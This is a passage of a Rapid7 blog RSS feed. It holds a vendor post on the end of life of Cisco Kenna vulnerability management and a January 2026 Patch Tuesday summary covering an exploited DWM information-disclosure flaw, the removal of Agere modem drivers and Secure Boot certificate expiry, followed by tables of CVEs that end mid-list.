undefined;'>Microsoft’s wildly successful business model is founded on a decades-long insistence on ironclad backwards compatibility. Why? Enterprise customers with deep pockets and deeper catalogues of ancient business applications. These retro capabilities come at a high price: a supervolcano of tech debt potentially unmatched in all of human history, and a seemingly endless supply of sort-of-new but depressingly familiar vulnerabilities.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For anyone responsible for defending a significant Microsoft footprint in 2026, tomorrow’s biggest problem remains today’s secrets exposed by yesterday’s software design choices.</span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/ve-patch-tuesday-windows-backwards-compatibility-challenge</link>
      <guid isPermaLink="false">blt3038202571eb4396</guid>
      <category><![CDATA[Patch Tuesday]]></category>
      <category><![CDATA[Artificial Intelligence]]></category>
      <category><![CDATA[Vulnerability Management]]></category>
      <category><![CDATA[Zero-Day]]></category><dc:creator><![CDATA[Adam Barnett]]></dc:creator>
      <pubDate>Wed, 28 Jan 2026 17:04:41 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt76ee31e15f145bd9/6849a5d2dc186db607081f3e/patch-tuesday-repeated.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[The End of the Road for Cisco Kenna: Take a Measured Path into Exposure Management]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>Cisco’s announcement that it will sunset Cisco Vulnerability Management (Kenna) marks a clear inflection point for many security teams. With </span><a href="https://www.cisco.com/c/en/us/products/collateral/security/vulnerability-management/vm-vi-appsec-eol.html"><span style='font-size: undefined;'>end-of-sale and end-of-life timelines</span></a><span style='font-size: undefined;'> now defined, and no replacement offering on the roadmap, Kenna customers face an unavoidable decision window. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Beyond the practical need to replace a tool, Kenna’s exit raises a bigger question for security leaders: </span><span style='font-size: undefined;'><strong>what should vulnerability management look like moving forward? </strong></span></p><h2 style="direction: ltr;">Not just a tool change</h2><p style="direction: ltr;"><span style='font-size: undefined;'>For many organizations, Kenna wasn’t “just another scanner”. Before their acquisition by Cisco in 2021, Kenna Security helped pioneer a shift away from chasing raw CVSS scores and toward prioritization based on real-world risk, influencing how many teams approach risk-based vulnerability management. Security teams invested years building workflows, reporting, and executive trust around that model. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>That’s why this moment feels different. Replacing Kenna isn’t about checking a feature box, it’s about protecting the integrity of the progress teams have already made while using this moment to elevate programs past traditional vulnerability management.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Security leaders are rightly cautious. No one wants to: </span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Rush into a short-term replacement vs. a platform that suits current and future needs</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Trade proven prioritization for untested promises </span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Disrupt remediation workflows that engineering teams finally trust </span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>At the same time, few teams believe traditional vulnerability management – isolated scanners, static scoring, endless ticket queues – is sufficient on its own anymore. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>So where does that leave you? </span></p><h2 style="direction: ltr;">“Risk-based vulnerability management is dead” doesn’t tell the full story</h2><p style="direction: ltr;"><span style='font-size: undefined;'>In response to Kenna’s end-of-life, much of the market has rushed to frame this as the end of risk-based vulnerability management (RBVM) altogether. The message is often loud and binary: </span><span style='font-size: undefined;'><em>RBVM is outdated, jump straight to </em></span><a href="https://www.rapid7.com/fundamentals/what-is-exposure-management/"><span style='font-size: undefined;'>exposure management</span></a><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In practice, that framing doesn’t match how security programs actually evolve. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Most organizations are not abandoning vulnerability management. They are </span><span style='font-size: undefined;'><strong>expanding it:</strong></span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>From on-prem to hybrid and cloud</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>From isolated findings to broader attack surface context </span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>From vulnerability lists to exposure-driven decisions </span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>From static to continuous</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>The mistake is assuming this evolution requires a hard reset, or that exposure management is completely separate and not part of that evolution.  </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For CISOs and hands-on leaders alike, the smarter question is: </span><span style='font-size: undefined;'><strong>how do we preserve what works today, while building toward what we know we’ll need tomorrow?</strong></span></p><h2 style="direction: ltr;">What Kenna customers should prioritize next </h2><p style="direction: ltr;"><span style='font-size: undefined;'>As you evaluate what comes after Kenna, the right decision comes down to which platform can consistently deliver security outcomes and measurable risk reduction: </span></p><h3><span style='font-size: undefined;'>Continuity without disruption</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Your team already understands risk-based prioritization. The next platform should strengthen that muscle, not force you back to severity-only thinking or one-dimensional scoring models that ignore business context and threat intelligence. </span></p><h3><span style='font-size: undefined;'>See risk clearly across on-prem, cloud, and external environments</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Risk doesn’t live exclusively on-prem or in the cloud. Vulnerability data needs to reflect the reality of modern environments – endpoints, cloud workloads, external-facing assets – without fragmenting visibility. It needs to build on what teams already have by supporting findings from a broad range of existing tools and services, so risk can be understood in one place instead of scattered across platforms. </span></p><h3><span style='font-size: undefined;'>Customizable remediation workflows</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Prioritization only matters if it leads to action. Look for platforms that help security and IT teams collaborate, track ownership, and measure progress without creating more friction. </span></p><h3><span style='font-size: undefined;'>A credible path forward</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure management is valuable only when it’s grounded in accurate data, operational context, and day-to-day usability. Security teams are already drowning in findings across tools, and without context that explains what matters and why, exposure management adds more noise instead of helping teams make decisions and reduce risk. That noise shows up in familiar ways: duplicate findings aren’t reconciled, conflicting risk scores between tools, unclear ownership for remediation, and long lists of issues with no clear path to action.</span></p><h2 style="direction: ltr;">Why this moment favors steady platforms, not big bets</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Kenna’s exit creates pressure, but pressure shouldn’t drive risky or forced decisions. Security leaders are accountable not just for vision, but for outcomes, such as: </span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Are we reducing real risk this quarter? </span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Can we explain prioritization decisions to the board? </span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Will this platform still support us two or three years from now? </span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>This is where vendor stability, roadmap clarity, and operational proof start to matter more than bold claims. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The strongest next steps are coming from </span><a href="https://www.rapid7.com/blog/post/em-rapid7-leader-2025-gartner-exposure-assessment-platform-magic-quadrant-mq-eap/"><span style='font-size: undefined;'>platforms that already deliver</span></a><span style='font-size: undefined;'> visibility across hybrid environments, mature, threat-informed vulnerability prioritization, and integrated remediation workflows that teams actually use. From there, exposure management becomes an evolution, not a leap of faith. </span></p><h2 style="direction: ltr;">A measured path forward</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Kenna’s EOL doesn’t signal the end of risk-based vulnerability management. It signals that security programs are ready to expect more from it. For security leaders this is an opportunity to reaffirm what has worked in your program, close real visibility and workflow gaps, and choose a platform that supports both near-term continuity and long-term growth.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The goal isn’t to chase the next trend. It’s to make a confident, practical decision – one that protects today’s outcomes while positioning your team for what’s next. </span></p><h2 style="direction: ltr;">Looking ahead</h2><p style="direction: ltr;"><span style='font-size: undefined;'>If you’re navigating what comes after Cisco Kenna, the most important step is understanding your options early, before timelines force rushed decisions. Explore what a confident transition can look like and how teams are approaching continuity today while preparing for exposure management tomorrow. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong></strong></span><a href="https://www.rapid7.com/compare/exposure-management-providers/"><span style='font-size: undefined;'><strong>Explore a confident path forward.</strong></span></a><span style='font-size: undefined;'><strong></strong></span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/em-eol-cisco-kenna-new-measured-path-into-exposure-management</link>
      <guid isPermaLink="false">bltbe80721161f90f4a</guid>
      <category><![CDATA[Exposure Command]]></category>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Michael Chroney]]></dc:creator>
      <pubDate>Tue, 27 Jan 2026 14:09:48 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt3cc8c945f314ec1f/68b9a045a7d14357b3ba893b/blog-hero-texture-lines.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Patch Tuesday - January 2026]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft is publishing 114 vulnerabilities this </span><a href="https://msrc.microsoft.com/update-guide/releaseNote/2026-Jan"><span style='font-size: undefined;'>January 2026 Patch Tuesday</span></a><span style='font-size: undefined;'>. Today’s menu includes just one vulnerability marked as exploited in the wild, as well as two vulnerabilities where Microsoft is aware of public disclosure. There are no critical remote code execution or elevation of privilege vulnerabilities. So far this month, Microsoft has already provided patches to address one browser vulnerability and around a dozen vulnerabilities in open source products, which are not included in the Patch Tuesday count above.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Windows DWM: exploited-in-the-wild information disclosure</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The Windows Desktop Windows Manager (DWM) is a high value target for vulnerability researchers and threat actors, and </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20805"><span style='font-size: undefined;'>CVE-2026-20805</span></a><span style='font-size: undefined;'> is the latest in an </span><a href="https://www.rapid7.com/blog/post/2025/05/13/patch-tuesday-may-2025/"><span style='font-size: undefined;'>occasional</span></a><span style='font-size: undefined;'> </span><a href="https://www.rapid7.com/blog/post/2024/05/14/patch-tuesday-may-2024/"><span style='font-size: undefined;'>series</span></a><span style='font-size: undefined;'> of exploited-in-the-wild zero-day vulnerabilities to have emerged from it. DWM is responsible for drawing everything on the display of a Windows system, which means it offers an enticing combination of privileged access and universal availability, since just about any process might need to display something. In this case, exploitation leads to improper disclosure of an ALPC port section address, which is a section of user mode memory where Windows components coordinate various actions between themselves.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The CVSS v3 score of 5.5 evaluates to medium severity, which wouldn’t typically scream “patch me first”, but Microsoft evaluates CVE-2026-20805 as important on their proprietary severity scale, and information disclosure vulnerabilities by their very nature tend to end up with lower CVSS scores, since there’s no direct impact on integrity or availability. Also, Microsoft information disclosure vulnerabilities very rarely end up marked as exploited in the wild; any that do are very likely to be part of a longer exploit chain. In this case, it’s likely that the improperly disclosed memory address gives an attacker a starting point in the hunt for the in-memory address of the DWM process, sidestepping Address Space Layout Randomization (ASLR), and greatly increasing the chance of developing a stable elevation of privilege exploit for DWM rather than a flakey blue screen of death generator.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Windows Agere modem driver: publicly disclosed elevation of privilege</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Back in October 2025, Microsoft removed a specific modem driver ltmdm64.sys from all versions of Windows, after it was implicated in </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-24052"><span style='font-size: undefined;'>CVE-2025-24052</span></a><span style='font-size: undefined;'>, an exploited-in-the-wild elevation of privilege vulnerability. Today sees another couple of modem drivers removed from Windows for a broadly similar reason: Microsoft is aware of functional exploit code for an elevation of privilege vulnerability in a very similar modem driver, tracked as </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2023-31096"><span style='font-size: undefined;'>CVE-2023-31096</span></a><span style='font-size: undefined;'>. That’s not a typo; this vulnerability was originally published via MITRE over two years ago, along with a credible public writeup by the original researcher. Today’s Windows patches remove agrsm64.sys and agrsm.sys. All three modem drivers were originally developed by the same now-defunct third party, and have been included in Windows for decades. These driver removals will pass unnoticed for most people, but you might find active modems still in a few contexts, including some industrial control systems.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Two questions remain: how many more legacy modem drivers are still present on a fully-patched Windows asset, and how many more elevation-to-SYSTEM vulnerabilities will emerge from them before Microsoft cuts off attackers who have been enjoying living off the land[line] by exploiting an entire class of dusty old device drivers? Although Microsoft doesn’t claim evidence of exploitation for CVE-2023-31096, the relevant 2023 write-up and the 2025 removal of the other Agere modem driver have provided two strong signals for anyone looking for Windows exploits in the meantime. In case you were wondering, there is no need to have a modem connected; the mere presence of the driver is enough to render an asset vulnerable.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Secure Boot: critical security feature bypass</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Today sees the publication of </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21265"><span style='font-size: undefined;'>CVE-2026-21265</span></a><span style='font-size: undefined;'>, which is a critical security feature bypass vulnerability affecting Windows Secure Boot. Fifteen years is a very long time indeed in information security, but the clock is running out on the Microsoft root certificates which have been signing essentially everything in the Secure Boot ecosystem since the days of Stuxnet. Microsoft issued replacement certificates back in 2023, alongside </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2023-24932"><span style='font-size: undefined;'>CVE-2023-24932</span></a><span style='font-size: undefined;'> which covered relevant Windows patches as well as </span><a href="https://support.microsoft.com/en-us/topic/how-to-manage-the-windows-boot-manager-revocations-for-secure-boot-changes-associated-with-cve-2023-24932-41a975df-beb2-40c1-99a3-b3ff139f832d"><span style='font-size: undefined;'>subsequent steps</span></a><span style='font-size: undefined;'> to remediate the Secure Boot bypass </span><a href="https://www.rapid7.com/blog/post/2023/05/09/patch-tuesday-may-2023/"><span style='font-size: undefined;'>exploited by the BlackLotus bootkit</span></a><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Once the ancient 2011 certificates expire later this year, Windows devices that do not have the new 2023 certificates can no longer receive Secure Boot security fixes. When updating the bootloader and BIOS, it is essential to prepare fully ahead of time for the specific OS and BIOS combination you’re working with, since incorrect remediation steps can lead to an unbootable system.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Microsoft lifecycle update</span></h3><p style="direction: ltr;"><a href="https://learn.microsoft.com/en-us/visualstudio/releases/2022/servicing-vs2022"><span style='font-size: undefined;'>Visual Studio 2022 LTSC 17.10 reaches end of support today</span></a><span style='font-size: undefined;'>, so now is a good time to upgrade to a newer minor version. Dynamics CRM 2016 (also known as Dynamics 365) also </span><a href="https://learn.microsoft.com/en-us/lifecycle/products/dynamics-crm-2016-dynamics-365?branch=live"><span style='font-size: undefined;'>reaches end of life</span></a><span style='font-size: undefined;'>. There are no other significant Microsoft product lifecycle changes this month.</span></p><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt88641280bee5f825/696722dad2d27d000807bca5/2026-01-vuln_count_component.png" alt="A bar chart showing vulnerability count by component for Microsoft Patch Tuesday 2026-Jan" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A bar chart showing vulnerability count by component for Microsoft Patch Tuesday 2026-Jan" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt88641280bee5f825/696722dad2d27d000807bca5/2026-01-vuln_count_component.png" data-sys-asset-uid="blt88641280bee5f825" data-sys-asset-filename="2026-01-vuln_count_component.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A bar chart showing vulnerability count by component for Microsoft Patch Tuesday 2026-Jan" data-sys-asset-position="center" sys-style-type="display"/></figure><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1ac5c6754179a0e0/696722da1f87f800082b5f98/2026-01-vuln_count_impact.png" alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2026-Jan" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2026-Jan" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1ac5c6754179a0e0/696722da1f87f800082b5f98/2026-01-vuln_count_impact.png" data-sys-asset-uid="blt1ac5c6754179a0e0" data-sys-asset-filename="2026-01-vuln_count_impact.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2026-Jan" data-sys-asset-position="center" sys-style-type="display"/></figure><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7191645574ab526c/696722da6e95f90008bf237b/2026-01-vuln_count_impact-component-heatmap.png" alt="A bar chart showing distribution of impact type by component for Microsoft Patch Tuesday 2026-Jan" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A bar chart showing distribution of impact type by component for Microsoft Patch Tuesday 2026-Jan" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7191645574ab526c/696722da6e95f90008bf237b/2026-01-vuln_count_impact-component-heatmap.png" data-sys-asset-uid="blt7191645574ab526c" data-sys-asset-filename="2026-01-vuln_count_impact-component-heatmap.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A bar chart showing distribution of impact type by component for Microsoft Patch Tuesday 2026-Jan" data-sys-asset-position="center" sys-style-type="display"/></figure><p></p><p></p><h2>Vulnerabilities by Product Family</h2><h3>Azure vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21224">CVE-2026-21224</a></td><td><p>Azure Connected Machine Agent Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21226">CVE-2026-21226</a></td><td><p>Azure Core shared client library for Python Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20965">CVE-2026-20965</a></td><td><p>Windows Admin Center Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr></tbody></table><h3>Developer Tools vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21219">CVE-2026-21219</a></td><td><p>Inbox COM Objects (Global Memory) Remote Code Execution Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr></tbody></table><h3>ESU vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20805">CVE-2026-20805</a></td><td><p>Desktop Window Manager Information Disclosure Vulnerability</p></td><td><p>Exploitation Detected</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20847">CVE-2026-20847</a></td><td><p>Microsoft Windows File Explorer Spoofing Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2023-31096">CVE-2023-31096</a></td><td><p>MITRE: CVE-2023-31096 Windows Agere Soft Modem Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>Yes</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20925">CVE-2026-20925</a></td><td><p>NTLM Hash Disclosure Spoofing Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20872">CVE-2026-20872</a></td><td><p>NTLM Hash Disclosure Spoofing Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20821">CVE-2026-20821</a></td><td><p>Remote Procedure Call Information Disclosure Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>6.2</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21265">CVE-2026-21265</a></td><td><p>Secure Boot Certificate Expiration Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>Yes</p></td><td><p>6.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20831">CVE-2026-20831</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20860">CVE-2026-20860</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20839">CVE-2026-20839</a></td><td><p>Windows Client-Side Caching (CSC) Service Information Disclosure Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20940">CVE-2026-20940</a></td><td><p>Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20820">CVE-2026-20820</a></td><td><p>Windows Common Log File System Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-0386">CVE-2026-0386</a></td><td><p>Windows Deployment Services Remote Code Execution Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20929">CVE-2026-20929</a></td><td><p>Windows HTTP.sys Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20816">CVE-2026-20816</a></td><td><p>Windows Installer Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20849">CVE-2026-20849</a></td><td><p>Windows Kerberos Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20833">CVE-2026-20833</a></td><td><p>Windows Kerberos Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20809">CVE-2026-20809</a></td><td><p>Windows Kernel Memory Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20875">CVE-2026-20875</a></td><td><p>Windows Local Security Authority Subsystem Service (LSASS) Denial of Service Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20869">CVE-2026-20869</a></td><td><p>Windows Local Session Manager (LSM) Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-55414">CVE-2024-55414</a></td><td><p>Windows Motorola Soft Modem Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20936">CVE-2026-20936</a></td><td><p>Windows NDIS Information Disclosure Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>4.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20840">CVE-2026-20840</a></td><td><p>Windows NTFS Remote Code Execution Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20922">CVE-2026-20922</a></td><td><p>Windows NTFS Remote Code Execution Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20824">CVE-2026-20824</a></td><td><p>Windows Remote Assistance Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20828">CVE-2026-20828</a></td><td><p>Windows rndismp6.sys Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>4.6</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20843">CVE-2026-20843</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20868">CVE-2026-20868</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20856">CVE-2026-20856</a></td><td><p>Windows Server Update Service (WSUS) Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20927">CVE-2026-20927</a></td><td><p>Windows SMB Server Denial of Service Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>5.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20919">CVE-2026-20919</a></td><td><p>Windows SMB Server Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20921">CVE-2026-20921</a></td><td><p>Windows SMB Server Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20926">CVE-2026-20926</a></td><td><p>Windows SMB Server Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20934">CVE-2026-20934</a></td><td><p>Windows SMB Server Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20848">CVE-2026-20848</a></td><td><p>Windows SMB Server Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20834">CVE-2026-20834</a></td><td><p>Windows Spoofing Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>4.6</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20931">CVE-2026-20931</a></td><td><p>Windows Telephony Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>8.0</p></td></tr></tbody></table><h3>Microsoft Office 